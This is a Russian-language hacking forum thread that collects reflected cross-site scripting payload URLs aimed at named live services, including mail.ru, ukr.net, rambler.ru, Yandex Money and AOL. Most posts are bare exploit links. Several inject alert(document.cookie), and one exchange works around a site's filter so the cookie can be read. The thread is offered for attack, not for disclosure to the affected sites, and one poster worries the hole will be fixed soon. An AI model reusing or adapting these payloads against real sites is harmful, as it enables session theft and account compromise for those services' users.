Форум АНТИЧАТ - Пассивные xss на почтовых серверах

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Пассивные xss на почтовых серверах (https://forum.antichat.xyz/showthread.php?t=88986)

http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

Код:

http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

http://maps.mail.ru

В строке поиска:

Код:

' onMouseOver='alert(1)'>

и "Найти"

kards.qip.ru
В любых комментариях в login/pass вставляем

Код:

"><img src='.' onerror='alert()'>

И нажимаем "Добавить комментарий"

http://rabota.mail.ru

Код:

http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='

crackmail: не пашет.

пффф, уже пофиксили

money.yandex.ru

https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie)

rambler.ru

Вроде ещё не выкладывали.

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//horoscopes.rambler.ru/names.html?words=">alert('XSS')[/COLOR][/COLOR]

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//dating.meta.ua/search.php?action=search&min_age=">alert(/XSS/)[/COLOR][/COLOR]

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//index.online.ua/?cx=&q=">alert('XSS')[/COLOR][/COLOR]

ukr.net

Не знаю выкладывали или нет, гугл не ответил точно.

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//freemail.ukr.net/q/reg?name=">alert('XSS')[/COLOR][/COLOR]

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E[/COLOR][/COLOR]

mail.ru

Парочка пассивных xss на форумах mail.ru

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=alert("xss")[/COLOR][/COLOR]

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E[/COLOR][/COLOR]

Пасcивка на mail.ru

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR]

Вот только в alert(document.cookie) точка заменяется на _

Это можно как-нибудь обойти?

Цитата:

Сообщение от satana666

Пасcивка на mail.ru

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR]

Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?

так будет лучше.

Код HTML:

http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)

Зря выложил ее, завтра уже будет закрыта.

Код HTML:

http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)